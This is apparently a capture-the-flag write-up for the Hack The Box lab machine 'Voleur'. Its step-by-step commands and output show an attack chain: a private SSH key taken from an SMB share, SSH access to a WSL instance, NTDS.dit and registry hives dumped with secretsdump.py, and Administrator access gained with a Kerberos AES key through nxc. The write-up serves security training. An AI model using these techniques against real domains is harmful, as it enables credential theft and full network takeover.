Accessing svc_backup
Continuing the pattern, let’s check SMB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
echo $PASS | kinit $USER
Password for jeremy.combs@VOLEUR.HTB:
klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: jeremy.combs@VOLEUR.HTB
Valid starting Expires Service principal
07/08/2025 20:32:28 07/09/2025 06:32:28 krbtgt/VOLEUR.HTB@VOLEUR.HTB
renew until 07/09/2025 20:32:27
smbclient //$DC/IT --use-kerberos required --use-krb5-ccache /tmp/krb5cc_1000
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jan 29 04:10:01 2025
.. DHS 0 Mon Jun 30 17:08:33 2025
Third-Line Support D 0 Thu Jan 30 11:11:29 2025
cd
5311743 blocks of size 4096. 873059 blocks available
smb: \> cd "Third-Line Support"
smb: \Third-Line Support\> ls
. D 0 Thu Jan 30 11:11:29 2025
.. D 0 Wed Jan 29 04:10:01 2025
id_rsa A 2602 Thu Jan 30 11:10:54 2025
Note.txt.txt A 186 Thu Jan 30 11:07:35 2025
5311743 blocks of size 4096. 873043 blocks available
smb: \Third-Line Support\> get id_rsa
getting file \Third-Line Support\id_rsa of size 2602 as id_rsa (2.3 KiloBytes/sec) (average 2.3 KiloBytes/sec)
smb: \Third-Line Support\> get Note.txt.txt
getting file \Third-Line Support\Note.txt.txt of size 186 as Note.txt.txt (0.2 KiloBytes/sec) (average 1.2 KiloBytes/sec)
We can see that we can find an id_rsa file, and a note.txt file.
1
2
3
4
5
6
7
8
9
10
cat Note.txt.txt
Jeremy,
Ive had enough of Windows Backup! Ive part configured WSL to see if we can utilize any of the backup tools from Linux.
Please see what you can set up.
Thanks,
Admin
Looks like Admin configured WSL and has sent Jeremy the id_rsa to use so he can ssh into the machine, let’s try to ssh.
1
2
3
4
5
6
7
8
chmod 600 id_rsa
ssh $USER@$DOMAIN -i id_rsa -p 2222
The authenticity of host '[voleur.htb]:2222 ([10.129.110.234]:2222)' cant be established.
ED25519 key fingerprint is SHA256:mKWAEwLTnEN2bJNi7fkc+BZodiXCIiP3ywSLJiZL0ss.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[voleur.htb]:2222' (ED25519) to the list of known hosts.
ADMIN@voleur.htb: Permission denied (publickey).
No luck with ADMIN, however the Note also mentions Windows Backup, there’s another account on the machine named svc_backup as we’ve seen before on the xlsx file.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
ssh $USER@$DOMAIN -i id_rsa -p 2222
Welcome to Ubuntu 20.04 LTS (GNU/Linux 4.4.0-20348-Microsoft x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue Jul 8 17:37:31 PDT 2025
System load: 0.52 Processes: 9
Usage of /home: unknown Users logged in: 0
Memory usage: 28% IPv4 address for eth0: 10.129.110.234
Swap usage: 0%
363 updates can be installed immediately.
257 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Thu Jan 30 04:26:24 2025 from 127.0.0.1
* Starting OpenBSD Secure Shell server sshd [ OK ]
svc_backup@DC:~$
Success! We’ve authenticated to the WSL instance as svc_backup
Privilege Escalation to Administrator
Let’s check if there’s any Windows Backups in our /mnt folder, this is the default folder that allows file transfer between WSL and Windows.
1
2
svc_backup@DC:~$ ls /mnt/c/IT/Third-Line\ Support/
Backups Note.txt.txt id_rsa
Looks like there’s an additional Backups folder that we couldn’t access before, looking around in it we can find NTDS.DIT
1
2
svc_backup@DC:~$ ls /mnt/c/IT/Third-Line\ Support/Backups/Active\ Directory/
ntds.dit ntds.jfm
We can also find the REGISTRY hives SYSTEM and SECURITY
1
2
svc_backup@DC:~$ ls /mnt/c/IT/Third-Line\ Support/Backups/registry/
SECURITY SYSTEM
Let’s transfer these files over to our box and use secretsdump.py.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
secretsdump.py -system SYSTEM -ntds ntds.dit -security SECURITY LOCAL
/home/kali/.local/share/uv/tools/impacket/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. Th
e pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0xbbdd1a32433b87bcc9b875321b883d2d
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:759d6c7b27b4c7c4feda8909bc656985b457ea8d7cee9e0be[REDACTED]
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:[REDACTED]
[*] DPAPI_SYSTEM
dpapi_machinekey:0x5d117895b83add68c59c7c48bb6db5923519f436
dpapi_userkey:0xdce451c1fdc323ee07272945e3e0013d5a07d1c3
[*] NL$KM
0000 06 6A DC 3B AE F7 34 91 73 0F 6C E0 55 FE A3 FF .j.;..4.s.l.U...
0010 30 31 90 0A E7 C6 12 01 08 5A D0 1E A5 BB D2 37 01.......Z.....7
0020 61 C3 FA 0D AF C9 94 4A 01 75 53 04 46 66 0A AC a......J.uS.Ff..
0030 D8 99 1F D3 BE 53 0C CF 6E 2A 4E 74 F2 E9 F2 EB .....S..n*Nt....
NL$KM:066adc3baef73491730f6ce055fea3ff3031900ae7c61201085ad01ea5bbd23761c3fa0dafc9944a0175530446660aacd8991fd3be530ccf6e2a4e74f2e9f2eb
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 898238e1ccd2ac0016a18c53f4569f40
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:[REDACTED]:::
We’ve successfully grabbed Administrator’s credentials from the NTDS file. NTLM is disabled, so let’s use the administrator’s AES key.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
nxc ldap $DC -d $DOMAIN -k -u $USER --aesKey $HASH -k -M whoami
LDAP dc.voleur.htb 389 DC [*] None (name:DC) (domain:voleur.htb)
LDAP dc.voleur.htb 389 DC [+] voleur.htb\ADMINISTRATOR:[REDACTED] (Pwn3d!)
WHOAMI dc.voleur.htb 389 DC description: Built-in account for administering the computer/domain
WHOAMI dc.voleur.htb 389 DC distinguishedName: CN=Administrator,CN=Users,DC=voleur,DC=htb
WHOAMI dc.voleur.htb 389 DC Member of: CN=Group Policy Creator Owners,CN=Users,DC=voleur,DC=htb
WHOAMI dc.voleur.htb 389 DC Member of: CN=Domain Admins,CN=Users,DC=voleur,DC=htb
WHOAMI dc.voleur.htb 389 DC Member of: CN=Enterprise Admins,CN=Users,DC=voleur,DC=htb
WHOAMI dc.voleur.htb 389 DC Member of: CN=Schema Admins,CN=Users,DC=voleur,DC=htb
WHOAMI dc.voleur.htb 389 DC Member of: CN=Administrators,CN=Builtin,DC=voleur,DC=htb
WHOAMI dc.voleur.htb 389 DC name: Administrator
WHOAMI dc.voleur.htb 389 DC Enabled: Yes
WHOAMI dc.voleur.htb 389 DC Password Never Expires: Yes
WHOAMI dc.voleur.htb 389 DC Last logon: 133964963798297602
WHOAMI dc.voleur.htb 389 DC pwdLastSet: 133825701137667113
WHOAMI dc.voleur.htb 389 DC logonCount: 109
WHOAMI dc.voleur.htb 389 DC sAMAccountName: Administrator
To achieve command execution we can simply use the smb module of the nxc suite.
1
2
3
4
5
6
7
8
9
10
11
12
13
nxc smb $DC -d $DOMAIN -k -u $USER --aesKey $HASH -k -x "dir C:\Users\Administrator\Desktop"
SMB dc.voleur.htb 445 dc [*] x64 (name:dc) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB dc.voleur.htb 445 dc [+] voleur.htb\ADMINISTRATOR:[REDACTED] (Pwn3d!)
SMB dc.voleur.htb 445 dc [+] Executed command via wmiexec
SMB dc.voleur.htb 445 dc Volume in drive C has no label.
SMB dc.voleur.htb 445 dc Volume Serial Number is A5C3-6454
SMB dc.voleur.htb 445 dc Directory of C:\Users\Administrator\Desktop
SMB dc.voleur.htb 445 dc 06/05/2025 03:33 PM <DIR> .
SMB dc.voleur.htb 445 dc 06/05/2025 03:30 PM <DIR> ..
SMB dc.voleur.htb 445 dc 01/29/2025 02:12 AM 2,308 Microsoft Edge.lnk
SMB dc.voleur.htb 445 dc 07/08/2025 12:37 AM 34 root.txt
SMB dc.voleur.htb 445 dc 2 File(s) 2,342 bytes
SMB dc.voleur.htb 445 dc 2 Dir(s) 3,552,526,336 bytes free
Just like that, we have Root!
tags: os/windows - diff/medium